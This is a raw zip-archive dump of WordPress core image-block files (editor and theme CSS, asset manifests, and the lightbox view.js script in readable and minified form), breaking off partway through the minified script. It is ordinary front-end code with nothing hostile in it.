.wp-block-image .components-spinner{ left:50%; position:absolute; top:50%; transform:translate(-50%, -50%); } .wp-block-image .components-resizable-box__container{ display:table; } .wp-block-image .components-resizable-box__container img{ display:block; height:inherit; width:inherit; } .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ left:0; margin:-1px 0; position:absolute; right:0; } @media (min-width:600px){ .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ margin:-1px; } } [data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{ height:auto; width:100%; } .wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{ display:table; } .wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{ caption-side:bottom; display:table-caption; } .wp-block[data-align=left]>.wp-block-image{ margin:.5em 1em .5em 0; } .wp-block[data-align=right]>.wp-block-image{ margin:.5em 0 .5em 1em; } .wp-block[data-align=center]>.wp-block-image{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block-image__crop-area{ max-width:100%; overflow:hidden; position:relative; width:100%; } .wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{ border:none; border-radius:0; } .wp-block-image__crop-icon{ align-items:center; display:flex; justify-content:center; min-width:48px; padding:0 8px; } .wp-block-image__crop-icon svg{ fill:currentColor; } .wp-block-image__zoom .components-popover__content{ min-width:260px; overflow:visible !important; } .wp-block-image__aspect-ratio{ align-items:center; display:flex; height:46px; margin-bottom:-8px; } .wp-block-image__aspect-ratio .components-button{ padding-left:0; padding-right:0; width:36px; }PK6[&'TTimage/view.min.asset.phpnu[ array(), 'version' => '32caaf5e7c6834efef4c'); PK6[#;Q;Q image/view.jsnu["use strict"; (self["__WordPressPrivateInteractivityAPI__"] = self["__WordPressPrivateInteractivityAPI__"] || []).push([[354],{ /***/ 699: /***/ (function(__unused_webpack_module, __unused_webpack___webpack_exports__, __webpack_require__) { /* harmony import */ var _wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(754); /** * WordPress dependencies */ const focusableSelectors = ['a[href]', 'area[href]', 'input:not([disabled]):not([type="hidden"]):not([aria-hidden])', 'select:not([disabled]):not([aria-hidden])', 'textarea:not([disabled]):not([aria-hidden])', 'button:not([disabled]):not([aria-hidden])', 'iframe', 'object', 'embed', '[contenteditable]', '[tabindex]:not([tabindex^="-"])']; /* * Stores a context-bound scroll handler. * * This callback could be defined inline inside of the store * object but it's created externally to avoid confusion about * how its logic is called. This logic is not referenced directly * by the directives in the markup because the scroll event we * need to listen to is triggered on the window; so by defining it * outside of the store, we signal that the behavior here is different. * If we find a compelling reason to move it to the store, feel free. * * @type {Function} */ let scrollCallback; /* * Tracks whether user is touching screen; used to * differentiate behavior for touch and mouse input. * * @type {boolean} */ let isTouching = false; /* * Tracks the last time the screen was touched; used to * differentiate behavior for touch and mouse input. * * @type {number} */ let lastTouchTime = 0; /* * Lightbox page-scroll handler: prevents scrolling. * * This handler is added to prevent scrolling behaviors that * trigger content shift while the lightbox is open. * * It would be better to accomplish this through CSS alone, but * using overflow: hidden is currently the only way to do so, and * that causes the layout to shift and prevents the zoom animation * from working in some cases because we're unable to account for * the layout shift when doing the animation calculations. Instead, * here we use JavaScript to prevent and reset the scrolling * behavior. In the future, we may be able to use CSS or overflow: hidden * instead to not rely on JavaScript, but this seems to be the best approach * for now that provides the best visual experience. * * @param {Object} context Interactivity page context? */ function handleScroll(context) { // We can't override the scroll behavior on mobile devices // because doing so breaks the pinch to zoom functionality, and we // want to allow users to zoom in further on the high-res image. if (!isTouching && Date.now() - lastTouchTime > 450) { // We are unable to use event.preventDefault() to prevent scrolling // because the scroll event can't be canceled, so we reset the position instead. window.scrollTo(context.core.image.scrollLeftReset, context.core.image.scrollTopReset); } } (0,_wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__/* .store */ .h)({ state: { core: { image: { windowWidth: window.innerWidth, windowHeight: window.innerHeight } } }, actions: { core: { image: { showLightbox: ({ context, event }) => { // We can't initialize the lightbox until the reference // image is loaded, otherwise the UX is broken. if (!context.core.image.imageLoaded) { return; } context.core.image.initialized = true; context.core.image.lastFocusedElement = window.document.activeElement; context.core.image.scrollDelta = 0; context.core.image.pointerType = event.pointerType; context.core.image.lightboxEnabled = true; setStyles(context, context.core.image.imageRef); context.core.image.scrollTopReset = window.pageYOffset || document.documentElement.scrollTop; // In most cases, this value will be 0, but this is included // in case a user has created a page with horizontal scrolling. context.core.image.scrollLeftReset = window.pageXOffset || document.documentElement.scrollLeft; // We define and bind the scroll callback here so // that we can pass the context and as an argument. // We may be able to change this in the future if we // define the scroll callback in the store instead, but // this approach seems to tbe clearest for now. scrollCallback = handleScroll.bind(null, context); // We need to add a scroll event listener to the window // here because we are unable to otherwise access it via // the Interactivity API directives. If we add a native way // to access the window, we can remove this. window.addEventListener('scroll', scrollCallback, false); }, hideLightbox: async ({ context }) => { context.core.image.hideAnimationEnabled = true; if (context.core.image.lightboxEnabled) { // We want to wait until the close animation is completed // before allowing a user to scroll again. The duration of this // animation is defined in the styles.scss and depends on if the // animation is 'zoom' or 'fade', but in any case we should wait // a few milliseconds longer than the duration, otherwise a user // may scroll too soon and cause the animation to look sloppy. setTimeout(function () { window.removeEventListener('scroll', scrollCallback); // If we don't delay before changing the focus, // the focus ring will appear on Firefox before // the image has finished animating, which looks broken. context.core.image.lightboxTriggerRef.focus({ preventScroll: true }); }, 450); context.core.image.lightboxEnabled = false; } }, handleKeydown: ({ context, actions, event }) => { if (context.core.image.lightboxEnabled) { if (event.key === 'Tab' || event.keyCode === 9) { // If shift + tab it change the direction if (event.shiftKey && window.document.activeElement === context.core.image.firstFocusableElement) { event.preventDefault(); context.core.image.lastFocusableElement.focus(); } else if (!event.shiftKey && window.document.activeElement === context.core.image.lastFocusableElement) { event.preventDefault(); context.core.image.firstFocusableElement.focus(); } } if (event.key === 'Escape' || event.keyCode === 27) { actions.core.image.hideLightbox({ context, event }); } } }, // This is fired just by lazily loaded // images on the page, not all images. handleLoad: ({ context, effects, ref }) => { context.core.image.imageLoaded = true; context.core.image.imageCurrentSrc = ref.currentSrc; effects.core.image.setButtonStyles({ context, ref }); }, handleTouchStart: () => { isTouching = true; }, handleTouchMove: ({ context, event }) => { // On mobile devices, we want to prevent triggering the // scroll event because otherwise the page jumps around as // we reset the scroll position. This also means that closing // the lightbox requires that a user perform a simple tap. This // may be changed in the future if we find a better alternative // to override or reset the scroll position during swipe actions. if (context.core.image.lightboxEnabled) { event.preventDefault(); } }, handleTouchEnd: () => { // We need to wait a few milliseconds before resetting // to ensure that pinch to zoom works consistently // on mobile devices when the lightbox is open. lastTouchTime = Date.now(); isTouching = false; } } } }, selectors: { core: { image: { roleAttribute: ({ context }) => { return context.core.image.lightboxEnabled ? 'dialog' : null; }, ariaModal: ({ context }) => { return context.core.image.lightboxEnabled ? 'true' : null; }, dialogLabel: ({ context }) => { return context.core.image.lightboxEnabled ? context.core.image.dialogLabel : null; }, lightboxObjectFit: ({ context }) => { if (context.core.image.initialized) { return 'cover'; } }, enlargedImgSrc: ({ context }) => { return context.core.image.initialized ? context.core.image.imageUploadedSrc : 'data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs='; } } } }, effects: { core: { image: { initOriginImage: ({ context, ref }) => { context.core.image.imageRef = ref; context.core.image.lightboxTriggerRef = ref.parentElement.querySelector('.lightbox-trigger'); if (ref.complete) { context.core.image.imageLoaded = true; context.core.image.imageCurrentSrc = ref.currentSrc; } }, initLightbox: async ({ context, ref }) => { if (context.core.image.lightboxEnabled) { const focusableElements = ref.querySelectorAll(focusableSelectors); context.core.image.firstFocusableElement = focusableElements[0]; context.core.image.lastFocusableElement = focusableElements[focusableElements.length - 1]; // Move focus to the dialog when opening it. ref.focus(); } }, setButtonStyles: ({ context, ref }) => { const { naturalWidth, naturalHeight, offsetWidth, offsetHeight } = ref; // If the image isn't loaded yet, we can't // calculate where the button should be. if (naturalWidth === 0 || naturalHeight === 0) { return; } const figure = ref.parentElement; const figureWidth = ref.parentElement.clientWidth; // We need special handling for the height because // a caption will cause the figure to be taller than // the image, which means we need to account for that // when calculating the placement of the button in the // top right corner of the image. let figureHeight = ref.parentElement.clientHeight; const caption = figure.querySelector('figcaption'); if (caption) { const captionComputedStyle = window.getComputedStyle(caption); figureHeight = figureHeight - caption.offsetHeight - parseFloat(captionComputedStyle.marginTop) - parseFloat(captionComputedStyle.marginBottom); } const buttonOffsetTop = figureHeight - offsetHeight; const buttonOffsetRight = figureWidth - offsetWidth; // In the case of an image with object-fit: contain, the // size of the element can be larger than the image itself, // so we need to calculate where to place the button. if (context.core.image.scaleAttr === 'contain') { // Natural ratio of the image. const naturalRatio = naturalWidth / naturalHeight; // Offset ratio of the image. const offsetRatio = offsetWidth / offsetHeight; if (naturalRatio >= offsetRatio) { // If it reaches the width first, keep // the width and compute the height. const referenceHeight = offsetWidth / naturalRatio; context.core.image.imageButtonTop = (offsetHeight - referenceHeight) / 2 + buttonOffsetTop + 16; context.core.image.imageButtonRight = buttonOffsetRight + 16; } else { // If it reaches the height first, keep // the height and compute the width. const referenceWidth = offsetHeight * naturalRatio; context.core.image.imageButtonTop = buttonOffsetTop + 16; context.core.image.imageButtonRight = (offsetWidth - referenceWidth) / 2 + buttonOffsetRight + 16; } } else { context.core.image.imageButtonTop = buttonOffsetTop + 16; context.core.image.imageButtonRight = buttonOffsetRight + 16; } }, setStylesOnResize: ({ state, context, ref }) => { if (context.core.image.lightboxEnabled && (state.core.image.windowWidth || state.core.image.windowHeight)) { setStyles(context, ref); } } } } } }, { afterLoad: ({ state }) => { window.addEventListener('resize', debounce(() => { state.core.image.windowWidth = window.innerWidth; state.core.image.windowHeight = window.innerHeight; })); } }); /* * Computes styles for the lightbox and adds them to the document. * * @function * @param {Object} context - An Interactivity API context * @param {Object} event - A triggering event */ function setStyles(context, ref) { // The reference img element lies adjacent // to the event target button in the DOM. let { naturalWidth, naturalHeight, offsetWidth: originalWidth, offsetHeight: originalHeight } = ref; let { x: screenPosX, y: screenPosY } = ref.getBoundingClientRect(); // Natural ratio of the image clicked to open the lightbox. const naturalRatio = naturalWidth / naturalHeight; // Original ratio of the image clicked to open the lightbox. let originalRatio = originalWidth / originalHeight; // If it has object-fit: contain, recalculate the original sizes // and the screen position without the blank spaces. if (context.core.image.scaleAttr === 'contain') { if (naturalRatio > originalRatio) { const heightWithoutSpace = originalWidth / naturalRatio; // Recalculate screen position without the top space. screenPosY += (originalHeight - heightWithoutSpace) / 2; originalHeight = heightWithoutSpace; } else { const widthWithoutSpace = originalHeight * naturalRatio; // Recalculate screen position without the left space. screenPosX += (originalWidth - widthWithoutSpace) / 2; originalWidth = widthWithoutSpace; } } originalRatio = originalWidth / originalHeight; // Typically, we use the image's full-sized dimensions. If those // dimensions have not been set (i.e. an external image with only one size), // the image's dimensions in the lightbox are the same // as those of the image in the content. let imgMaxWidth = parseFloat(context.core.image.targetWidth !== 'none' ? context.core.image.targetWidth : naturalWidth); let imgMaxHeight = parseFloat(context.core.image.targetHeight !== 'none' ? context.core.image.targetHeight : naturalHeight); // Ratio of the biggest image stored in the database. let imgRatio = imgMaxWidth / imgMaxHeight; let containerMaxWidth = imgMaxWidth; let containerMaxHeight = imgMaxHeight; let containerWidth = imgMaxWidth; let containerHeight = imgMaxHeight; // Check if the target image has a different ratio than the original one (thumbnail). // Recalculate the width and height. if (naturalRatio.toFixed(2) !== imgRatio.toFixed(2)) { if (naturalRatio > imgRatio) { // If the width is reached before the height, we keep the maxWidth // and recalculate the height. // Unless the difference between the maxHeight and the reducedHeight // is higher than the maxWidth, where we keep the reducedHeight and // recalculate the width. const reducedHeight = imgMaxWidth / naturalRatio; if (imgMaxHeight - reducedHeight > imgMaxWidth) { imgMaxHeight = reducedHeight; imgMaxWidth = reducedHeight * naturalRatio; } else { imgMaxHeight = imgMaxWidth / naturalRatio; } } else { // If the height is reached before the width, we keep the maxHeight // and recalculate the width. // Unless the difference between the maxWidth and the reducedWidth // is higher than the maxHeight, where we keep the reducedWidth and // recalculate the height. const reducedWidth = imgMaxHeight * naturalRatio; if (imgMaxWidth - reducedWidth > imgMaxHeight) { imgMaxWidth = reducedWidth; imgMaxHeight = reducedWidth / naturalRatio; } else { imgMaxWidth = imgMaxHeight * naturalRatio; } } containerWidth = imgMaxWidth; containerHeight = imgMaxHeight; imgRatio = imgMaxWidth / imgMaxHeight; // Calculate the max size of the container. if (originalRatio > imgRatio) { containerMaxWidth = imgMaxWidth; containerMaxHeight = containerMaxWidth / originalRatio; } else { containerMaxHeight = imgMaxHeight; containerMaxWidth = containerMaxHeight * originalRatio; } } // If the image has been pixelated on purpose, keep that size. if (originalWidth > containerWidth || originalHeight > containerHeight) { containerWidth = originalWidth; containerHeight = originalHeight; } // Calculate the final lightbox image size and the // scale factor. MaxWidth is either the window container // (accounting for padding) or the image resolution. let horizontalPadding = 0; if (window.innerWidth > 480) { horizontalPadding = 80; } else if (window.innerWidth > 1920) { horizontalPadding = 160; } const verticalPadding = 80; const targetMaxWidth = Math.min(window.innerWidth - horizontalPadding, containerWidth); const targetMaxHeight = Math.min(window.innerHeight - verticalPadding, containerHeight); const targetContainerRatio = targetMaxWidth / targetMaxHeight; if (originalRatio > targetContainerRatio) { // If targetMaxWidth is reached before targetMaxHeight containerWidth = targetMaxWidth; containerHeight = containerWidth / originalRatio; } else { // If targetMaxHeight is reached before targetMaxWidth containerHeight = targetMaxHeight; containerWidth = containerHeight * originalRatio; } const containerScale = originalWidth / containerWidth; const lightboxImgWidth = imgMaxWidth * (containerWidth / containerMaxWidth); const lightboxImgHeight = imgMaxHeight * (containerHeight / containerMaxHeight); // Add the CSS variables needed. let styleTag = document.getElementById('wp-lightbox-styles'); if (!styleTag) { styleTag = document.createElement('style'); styleTag.id = 'wp-lightbox-styles'; document.head.appendChild(styleTag); } // As of this writing, using the calculations above will render the lightbox // with a small, erroneous whitespace on the left side of the image in iOS Safari, // perhaps due to an inconsistency in how browsers handle absolute positioning and CSS // transformation. In any case, adding 1 pixel to the container width and height solves // the problem, though this can be removed if the issue is fixed in the future. styleTag.innerHTML = ` :root { --wp--lightbox-initial-top-position: ${screenPosY}px; --wp--lightbox-initial-left-position: ${screenPosX}px; --wp--lightbox-container-width: ${containerWidth + 1}px; --wp--lightbox-container-height: ${containerHeight + 1}px; --wp--lightbox-image-width: ${lightboxImgWidth}px; --wp--lightbox-image-height: ${lightboxImgHeight}px; --wp--lightbox-scale: ${containerScale}; } `; } /* * Debounces a function call. * * @function * @param {Function} func - A function to be called * @param {number} wait - The time to wait before calling the function */ function debounce(func, wait = 50) { let timeout; return () => { const later = () => { timeout = null; func(); }; clearTimeout(timeout); timeout = setTimeout(later, wait); }; } /***/ }) }, /******/ function(__webpack_require__) { // webpackRuntimeModules /******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); } /******/ var __webpack_exports__ = (__webpack_exec__(699)); /******/ } ]);PK6[~ͪimage/theme.min.cssnu[.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}PK6[?CCimage/style.min.cssnu[.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{border-radius:inherit}.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{display:table}.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{caption-side:bottom;display:table-caption}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-image .is-style-rounded img,.wp-block-image.is-style-circle-mask img,.wp-block-image.is-style-rounded img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url('data:image/svg+xml;utf8,');mask-image:url('data:image/svg+xml;utf8,');mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}.wp-block-image :where(.has-border-color){border-style:solid}.wp-block-image :where([style*=border-top-color]){border-top-style:solid}.wp-block-image :where([style*=border-right-color]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-color]){border-left-style:solid}.wp-block-image :where([style*=border-width]){border-style:solid}.wp-block-image :where([style*=border-top-width]){border-top-style:solid}.wp-block-image :where([style*=border-right-width]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-width]){border-left-style:solid}.wp-block-image figure{margin:0}.wp-lightbox-container{display:flex;flex-direction:column;position:relative}.wp-lightbox-container img{cursor:zoom-in}.wp-lightbox-container img:hover+button{opacity:1}.wp-lightbox-container button{align-items:center;-webkit-backdrop-filter:blur(16px) saturate(180%);backdrop-filter:blur(16px) saturate(180%);background-color:rgba(90,90,90,.25);border:none;border-radius:4px;cursor:zoom-in;display:flex;height:20px;justify-content:center;opacity:0;padding:0;position:absolute;right:16px;text-align:center;top:16px;transition:opacity .2s ease;width:20px;z-index:100}.wp-lightbox-container button:focus-visible{outline:3px auto rgba(90,90,90,.25);outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:pointer;opacity:1}.wp-lightbox-container button:focus{opacity:1}.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){background-color:rgba(90,90,90,.25);border:none}.wp-lightbox-overlay{box-sizing:border-box;cursor:zoom-out;height:100vh;left:0;overflow:hidden;position:fixed;top:0;visibility:hidden;width:100vw;z-index:100000}.wp-lightbox-overlay .close-button{align-items:center;cursor:pointer;display:flex;justify-content:center;min-height:40px;min-width:40px;padding:0;position:absolute;right:calc(env(safe-area-inset-right) + 16px);top:calc(env(safe-area-inset-top) + 16px);z-index:5000000}.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){background:none;border:none}.wp-lightbox-overlay .lightbox-image-container{height:var(--wp--lightbox-container-height);left:50%;overflow:hidden;position:absolute;top:50%;transform:translate(-50%,-50%);transform-origin:top left;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:0 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{height:var(--wp--lightbox-image-height);min-height:var(--wp--lightbox-image-height);min-width:var(--wp--lightbox-image-width);width:var(--wp--lightbox-image-width)}.wp-lightbox-overlay .wp-block-image figcaption{display:none}.wp-lightbox-overlay button{background:none;border:none}.wp-lightbox-overlay .scrim{background-color:#fff;height:100%;opacity:.9;position:absolute;width:100%;z-index:2000000}.wp-lightbox-overlay.active{animation:turn-on-visibility .25s both;visibility:visible}.wp-lightbox-overlay.active img{animation:turn-on-visibility .35s both}.wp-lightbox-overlay.hideanimationenabled:not(.active){animation:turn-off-visibility .35s both}.wp-lightbox-overlay.hideanimationenabled:not(.active) img{animation:turn-off-visibility .25s both}@media (prefers-reduced-motion:no-preference){.wp-lightbox-overlay.zoom.active{animation:none;opacity:1;visibility:visible}.wp-lightbox-overlay.zoom.active .lightbox-image-container{animation:lightbox-zoom-in .4s}.wp-lightbox-overlay.zoom.active .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active){animation:none}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.hideanimationenabled:not(.active) .scrim{animation:turn-off-visibility .4s forwards}}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom-in{0%{transform:translate(calc(-50vw + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale))}to{transform:translate(-50%,-50%) scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(-50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc(-50vw + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}PK6[5himage/theme-rtl.cssnu[.wp-block-image figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-image figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-image{ margin:0 0 1em; }PK6[ B image/editor-rtl.cssnu[.wp-block-image.wp-block-image.is-selected .components-placeholder{ background-color:#fff; border:none; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; filter:none !important; } .wp-block-image.wp-block-image.is-selected .components-placeholder>svg{ opacity:0; } .wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{ display:none; } .wp-block-image.wp-block-image.is-selected .components-placeholder:before{ opacity:0; } .wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{ transition:none; } figure.wp-block-image:not(.wp-block){ margin:0; } .wp-block-image{ position:relative; } .wp-block-image .is-applying img,.wp-block-image.is-transient img{ opacity:.3; } .wp-block-image figcaption img{ display:inline; } .wp-block-image .components-spinner{ position:absolute; right:50%; top:50%; transform:translate(50%, -50%); } .wp-block-image .components-resizable-box__container{ display:table; } .wp-block-image .components-resizable-box__container img{ display:block; height:inherit; width:inherit; } .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ left:0; margin:-1px 0; position:absolute; right:0; } @media (min-width:600px){ .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ margin:-1px; } } [data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{ height:auto; width:100%; } .wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{ display:table; } .wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{ caption-side:bottom; display:table-caption; } .wp-block[data-align=left]>.wp-block-image{ margin:.5em 0 .5em 1em; } .wp-block[data-align=right]>.wp-block-image{ margin:.5em 1em .5em 0; } .wp-block[data-align=center]>.wp-block-image{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block-image__crop-area{ max-width:100%; overflow:hidden; position:relative; width:100%; } .wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{ border:none; border-radius:0; } .wp-block-image__crop-icon{ align-items:center; display:flex; justify-content:center; min-width:48px; padding:0 8px; } .wp-block-image__crop-icon svg{ fill:currentColor; } .wp-block-image__zoom .components-popover__content{ min-width:260px; overflow:visible !important; } .wp-block-image__aspect-ratio{ align-items:center; display:flex; height:46px; margin-bottom:-8px; } .wp-block-image__aspect-ratio .components-button{ padding-left:0; padding-right:0; width:36px; }PK6[xTTimage/view.asset.phpnu[ array(), 'version' => '749bd8d7dd37390bdeea'); PK6[ image/editor-rtl.min.cssnu[.wp-block-image.wp-block-image.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e;filter:none!important}.wp-block-image.wp-block-image.is-selected .components-placeholder>svg{opacity:0}.wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-image.wp-block-image.is-selected .components-placeholder:before{opacity:0}.wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{transition:none}figure.wp-block-image:not(.wp-block){margin:0}.wp-block-image{position:relative}.wp-block-image .is-applying img,.wp-block-image.is-transient img{opacity:.3}.wp-block-image figcaption img{display:inline}.wp-block-image .components-spinner{position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}.wp-block-image .components-resizable-box__container{display:table}.wp-block-image .components-resizable-box__container img{display:block;height:inherit;width:inherit}.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{left:0;margin:-1px 0;position:absolute;right:0}@media (min-width:600px){.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{margin:-1px}}[data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{height:auto;width:100%}.wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{display:table}.wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{caption-side:bottom;display:table-caption}.wp-block[data-align=left]>.wp-block-image{margin:.5em 0 .5em 1em}.wp-block[data-align=right]>.wp-block-image{margin:.5em 1em .5em 0}.wp-block[data-align=center]>.wp-block-image{margin-left:auto;margin-right:auto;text-align:center}.wp-block-image__crop-area{max-width:100%;overflow:hidden;position:relative;width:100%}.wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{border:none;border-radius:0}.wp-block-image__crop-icon{align-items:center;display:flex;justify-content:center;min-width:48px;padding:0 8px}.wp-block-image__crop-icon svg{fill:currentColor}.wp-block-image__zoom .components-popover__content{min-width:260px;overflow:visible!important}.wp-block-image__aspect-ratio{align-items:center;display:flex;height:46px;margin-bottom:-8px}.wp-block-image__aspect-ratio .components-button{padding-left:0;padding-right:0;width:36px}PK6[##image/view.min.jsnu["use strict";(self.__WordPressPrivateInteractivityAPI__=self.__WordPressPrivateInteractivityAPI__||[]).push([[354],{699:function(e,t,i){var o=i(754);const n=["a[href]","area[href]",'input:not([disabled]):not([type="hidden"]):not([aria-hidden])',"select:not([disabled]):not([aria-hidden])","textarea:not([disabled]):not([aria-hidden])","button:not([disabled]):not([aria-hidden])","iframe","object","embed","[contenteditable]",'[tabindex]:not([tabindex^="-"])'];let a,r=!1,c=0;function l(e){!r&&Date.now()-c>450&&window.scrollTo(e.core.image.scrollLeftReset,e.core.image.scrollTopReset)}function g(e,t){let{naturalWidth:i,naturalHeight:o,offsetWidth:n,offsetHeight:a}=t,{x:r,y:c}=t.getBoundingClientRect();const l=i/o;let g=n/a;if("contain"===e.core.image.scaleAttr)if(l>g){const e=n/l;c+=(a-e)/2,a=e}else{const e=a*l;r+=(n-e)/2,n=e}g=n/a;let d=parseFloat("none"!==e.core.image.targetWidth?e.core.image.targetWidth:i),m=parseFloat("none"!==e.core.image.targetHeight?e.core.image.targetHeight:o),s=d/m,h=d,u=m,f=d,w=m;if(l.toFixed(2)!==s.toFixed(2)){if(l>s){const e=d/l;m-e>d?(m=e,d=e*l):m=d/l}else{const e=m*l;d-e>m?(d=e,m=e/l):d=m*l}f=d,w=m,s=d/m,g>s?(h=d,u=h/g):(u=m,h=u*g)}(n>f||a>w)&&(f=n,w=a);let b=0;window.innerWidth>480?b=80:window.innerWidth>1920&&(b=160);const x=Math.min(window.innerWidth-b,f),p=Math.min(window.innerHeight-80,w);g>x/p?(f=x,w=f/g):(w=p,f=w*g);const E=n/f,y=d*(f/h),v=m*(w/u);let A=document.getElementById("wp-lightbox-styles");A||(A=document.createElement("style"),A.id="wp-lightbox-styles",document.head.appendChild(A)),A.innerHTML=`\n\t\t:root {\n\t\t\t--wp--lightbox-initial-top-position: ${c}px;\n\t\t\t--wp--lightbox-initial-left-position: ${r}px;\n\t\t\t--wp--lightbox-container-width: ${f+1}px;\n\t\t\t--wp--lightbox-container-height: ${w+1}px;\n\t\t\t--wp--lightbox-image-width: ${y}px;\n\t\t\t--wp--lightbox-image-height: ${v}px;\n\t\t\t--wp--lightbox-scale: 